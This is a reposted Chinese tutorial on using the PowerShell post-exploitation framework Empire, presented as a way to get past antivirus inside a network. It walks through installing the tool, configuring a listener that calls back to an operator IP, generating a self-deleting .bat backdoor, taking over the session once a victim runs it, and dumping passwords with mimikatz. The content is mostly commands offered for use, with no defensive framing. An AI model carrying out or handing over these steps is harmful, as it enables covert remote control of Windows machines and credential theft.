安基网 首页 安全 渗透测试 查看内容

内网渗透绕过查杀的一种新思路之Empire

2020-4-4 13:45| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 摘要: 一款基于PowerShell的后渗透测试工具介绍在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。安装git clone https://github.com/EmpireProject/Empire.gitEmpiresetup目录执行install.sh文件./install.sh最后设置数据库密码那里可以默认回车, ...

摘要: 一款基于PowerShell的后渗透测试工具

介绍

在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。

安装


git clone https://github.com/EmpireProject/Empire.git

Empiresetup目录执行install.sh文件


./install.sh

最后设置数据库密码那里可以默认回车,也可以自己设置

踩坑

如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。


使用

· 监听

(Empire)> listeners

· 选择监听方式

(Empire: listeners) > uselistener http

· 查看需要配置的选项

Empire: listeners/http) > info

· 设置监听的名字

(Empire: listeners/http) > set Name backdoor


(Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址


(Empire: listeners/http) > set Port 4447 #设置本地监听端口

Empire: listeners/http) > execute #执行监听

至此,监听工作完成。我们开始配置生成后门。


生成木马

(Empire: listeners/http) > back #返回上层模块

(Empire: listeners) > usestager windows/launcher_bat backdoor # 选择木马种类

这里我选择的是bat类型的脚本,当然你们可以选择其他的。后面的backdoor就是刚刚我们设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

(Empire: stager/windows/launcher_bat) > info #查看需要配置的

你可以set OutFile 到你指定的目录(绝对路径)

(Empire: stager/windows/launcher_bat) > execute #执行生成木马

拷贝运行木马、

006.jpg弹出一个黑框后,它自动消失了,是因为我们刚才生成backdoor的时候其中一个选项delete设置的True,运行结束后删除自身。点击完我们的backdoor之后,我们回到我们的机器可以看到已经获取到了客户端的一个会话。


(Empire: stager/windows/launcher_bat) > agents #查看获取的代理会话

一个会话已经建立完成。


(Empire: agents) > rename HZFT7AX1 win7pro #更改会话名字


· 建立会话

interact kali


· 查看密码

mimikatz



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6811314067928515085/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部